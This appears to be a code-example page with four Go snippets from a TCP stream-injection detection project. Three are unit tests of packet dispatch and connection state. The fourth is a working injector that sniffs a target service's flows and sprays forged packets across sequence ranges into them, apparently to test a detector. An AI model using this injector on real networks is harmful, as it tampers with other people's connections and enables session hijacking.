예제 #1
0
func TestInquisitorSourceReceiveOne(t *testing.T) {

	_, dispatcher, sniffer := SetupTestInquisitor()

	ip := layers.IPv4{
		SrcIP:    net.IP{1, 2, 3, 4},
		DstIP:    net.IP{2, 3, 4, 5},
		Version:  4,
		TTL:      64,
		Protocol: layers.IPProtocolTCP,
	}
	tcp := layers.TCP{
		Seq:     3,
		SYN:     false,
		SrcPort: 1,
		DstPort: 2,
	}
	flow := types.NewTcpIpFlowFromLayers(ip, tcp)
	p := types.PacketManifest{
		Timestamp: time.Now(),
		Flow:      flow,
		IP:        ip,
		TCP:       tcp,
		Payload:   []byte{1, 2, 3, 4, 5, 6, 7},
	}

	log.Print("before receive packet")
	dispatcher.ReceivePacket(&p)
	log.Print("after receive packet")
	connsChan := dispatcher.GetObservedConnectionsChan(1)
	log.Print("fu1")
	<-connsChan
	log.Print("fu2")
	log.Print("after connsChan receive")
	conns := dispatcher.Connections()
	log.Print("fu3")
	if len(conns) != 1 {
		t.Fatalf("number of connections %d is not 1", len(conns))
	}
	conn := conns[0]
	mockConn := conn.(*MockConnection)
	log.Print("listen to packet observer chan")
	<-mockConn.packetObserverChan
	sniffer.Stop()
}
예제 #2
0
func TestInquisitorResetTwice(t *testing.T) {

	_, dispatcher, sniffer := SetupTestInquisitor()

	startSeq := 3
	ip1 := layers.IPv4{
		SrcIP:    net.IP{1, 2, 3, 4},
		DstIP:    net.IP{2, 3, 4, 5},
		Version:  4,
		TTL:      64,
		Protocol: layers.IPProtocolTCP,
	}
	tcp1 := layers.TCP{
		Seq:     uint32(startSeq),
		SYN:     false,
		RST:     true,
		SrcPort: 1,
		DstPort: 2,
	}
	flow1 := types.NewTcpIpFlowFromLayers(ip1, tcp1)
	packet1 := types.PacketManifest{
		Timestamp: time.Now(),
		Flow:      flow1,
		IP:        ip1,
		TCP:       tcp1,
		Payload:   []byte{1, 2, 3, 4, 5, 6, 7},
	}

	ip2 := layers.IPv4{
		SrcIP:    net.IP{1, 2, 3, 4},
		DstIP:    net.IP{2, 3, 4, 5},
		Version:  4,
		TTL:      64,
		Protocol: layers.IPProtocolTCP,
	}
	tcp2 := layers.TCP{
		Seq:     uint32(startSeq + len(packet1.Payload)),
		SYN:     false,
		RST:     true,
		SrcPort: 1,
		DstPort: 2,
	}
	flow2 := types.NewTcpIpFlowFromLayers(ip2, tcp2)
	packet2 := types.PacketManifest{
		Timestamp: time.Now(),
		Flow:      flow2,
		IP:        ip2,
		TCP:       tcp2,
		Payload:   []byte{1, 2, 3, 4, 5, 6, 7},
	}
	connsChan := dispatcher.GetObservedConnectionsChan(1)
	dispatcher.ReceivePacket(&packet1)
	<-connsChan
	conns := dispatcher.Connections()
	if len(conns) != 1 {
		t.Fatalf("number of connections %d is not 1", len(conns))
	}
	conn := conns[0]
	mockConn := conn.(*MockConnection)
	<-mockConn.packetObserverChan
	conns = dispatcher.Connections()
	if len(conns) != 1 {
		t.Fatalf("number of connections %d is not 1", len(conns))
	}
	conn = conns[0]
	mockConn = conn.(*MockConnection)
	dispatcher.ReceivePacket(&packet2)
	<-mockConn.packetObserverChan
	sniffer.Stop()
}
예제 #3
0
func TestStateDataTransfer(t *testing.T) {
	options := ConnectionOptions{
		MaxBufferedPagesTotal:         0,
		MaxBufferedPagesPerConnection: 0,
		MaxRingPackets:                40,
		PageCache:                     nil,
		LogDir:                        "fake-log-dir",
		AttackLogger:                  NewDummyAttackLogger(),
	}

	f := &DefaultConnFactory{}
	conn := f.Build(options).(*Connection)

	conn.state = TCP_DATA_TRANSFER
	clientRingCount := 0
	ip := layers.IPv4{
		SrcIP:    net.IP{1, 2, 3, 4},
		DstIP:    net.IP{2, 3, 4, 5},
		Version:  4,
		TTL:      64,
		Protocol: layers.IPProtocolTCP,
	}
	tcp := layers.TCP{
		Seq:     3,
		SYN:     false,
		SrcPort: 1,
		DstPort: 2,
	}
	flow := types.NewTcpIpFlowFromLayers(ip, tcp)
	p := types.PacketManifest{
		Timestamp: time.Now(),
		Flow:      flow,
		IP:        ip,
		TCP:       tcp,
		Payload:   []byte{1, 2, 3, 4, 5, 6, 7},
	}
	conn.serverFlow = flow
	conn.clientFlow = flow.Reverse()
	conn.clientNextSeq = 9666
	conn.serverNextSeq = 3

	conn.ReceivePacket(&p)
	if conn.state != TCP_DATA_TRANSFER {
		t.Error("invalid state transition\n")
		t.Fail()
	}

	clientRingCount = conn.ClientStreamRing.Prev().Count()

	if clientRingCount != 1 {
		t.Errorf("clientRingCount %d not correct", clientRingCount)
		t.Fail()
	}

	// next set of tests
	tcp = layers.TCP{
		Seq:     10,
		SYN:     false,
		SrcPort: 1,
		DstPort: 2,
	}
	p = types.PacketManifest{
		Timestamp: time.Now(),
		Flow:      flow,
		IP:        ip,
		TCP:       tcp,
		Payload:   []byte{1, 2, 3, 4, 5, 6, 7},
	}
	conn.ReceivePacket(&p)

	if conn.state != TCP_DATA_TRANSFER {
		t.Error("invalid state transition\n")
		t.Fail()
	}
	clientRingCount = conn.ClientStreamRing.Prev().Count()
	if clientRingCount != 2 {
		t.Errorf("clientRingCount %d not correct", clientRingCount)
		t.Fail()
	}

	// next test
	tcp = layers.TCP{
		Seq:     5,
		SYN:     false,
		SrcPort: 1,
		DstPort: 2,
	}
	p = types.PacketManifest{
		Timestamp: time.Now(),
		Flow:      flow,
		IP:        ip,
		TCP:       tcp,
		Payload:   []byte{1, 2, 3, 4, 5, 6, 7},
	}
	conn.ReceivePacket(&p)

	if conn.state != TCP_DATA_TRANSFER {
		t.Error("invalid state transition\n")
		t.Fail()
	}
	clientRingCount = conn.ClientStreamRing.Prev().Count()
	if clientRingCount != 2 {
		t.Errorf("clientRingCount %d not correct", clientRingCount)
		t.Fail()
	}

}
예제 #4
0
func main() {
	defer util.Run()()

	var eth layers.Ethernet
	var dot1q layers.Dot1Q
	var ip4 layers.IPv4
	var ip6 layers.IPv6
	var ip6extensions layers.IPv6ExtensionSkipper
	var tcp layers.TCP
	var payload gopacket.Payload
	decoded := make([]gopacket.LayerType, 0, 4)

	// target/track all TCP flows from this TCP/IP service endpoint
	trackedFlows := make(map[types.TcpIpFlow]int)
	serviceIP := net.ParseIP(*serviceIPstr)
	if serviceIP == nil {
		panic(fmt.Sprintf("non-ip target: %q\n", serviceIPstr))
	}
	serviceIP = serviceIP.To4()
	if serviceIP == nil {
		panic(fmt.Sprintf("non-ipv4 target: %q\n", serviceIPstr))
	}

	streamInjector := attack.TCPStreamInjector{}
	err := streamInjector.Init("0.0.0.0")
	if err != nil {
		panic(err)
	}
	streamInjector.Payload = []byte("meowmeowmeow")

	handle, err := pcap.OpenLive(*iface, int32(*snaplen), true, pcap.BlockForever)
	if err != nil {
		log.Fatal("error opening pcap handle: ", err)
	}
	if err := handle.SetBPFFilter(*filter); err != nil {
		log.Fatal("error setting BPF filter: ", err)
	}
	parser := gopacket.NewDecodingLayerParser(layers.LayerTypeEthernet,
		&eth, &dot1q, &ip4, &ip6, &ip6extensions, &tcp, &payload)
	flow := &types.TcpIpFlow{}

	log.Print("collecting packets...\n")

	for {
		data, ci, err := handle.ZeroCopyReadPacketData()
		if err != nil {
			log.Printf("error getting packet: %v %s", err, ci)
			continue
		}
		err = parser.DecodeLayers(data, &decoded)
		if err != nil {
			log.Printf("error decoding packet: %v", err)
			continue
		}

		// if we see a flow coming from the tcp/ip service we are watching
		// then track how many packets we receive from each flow
		if tcp.SrcPort == layers.TCPPort(*servicePort) && ip4.SrcIP.Equal(serviceIP) {
			flow = types.NewTcpIpFlowFromLayers(ip4, tcp)
			_, isTracked := trackedFlows[*flow]
			if isTracked {
				trackedFlows[*flow] += 1
			} else {
				trackedFlows[*flow] = 1
			}
		} else {
			continue
		}

		// after 3 packets from a given flow then inject packets into the stream
		if trackedFlows[*flow]%10 == 0 {
			err = streamInjector.SetIPLayer(ip4)
			if err != nil {
				panic(err)
			}
			streamInjector.SetTCPLayer(tcp)
			err = streamInjector.SpraySequenceRangePackets(tcp.Seq, 20)
			if err != nil {
				panic(err)
			}
			log.Print("packet spray sent!\n")
		}
	}
}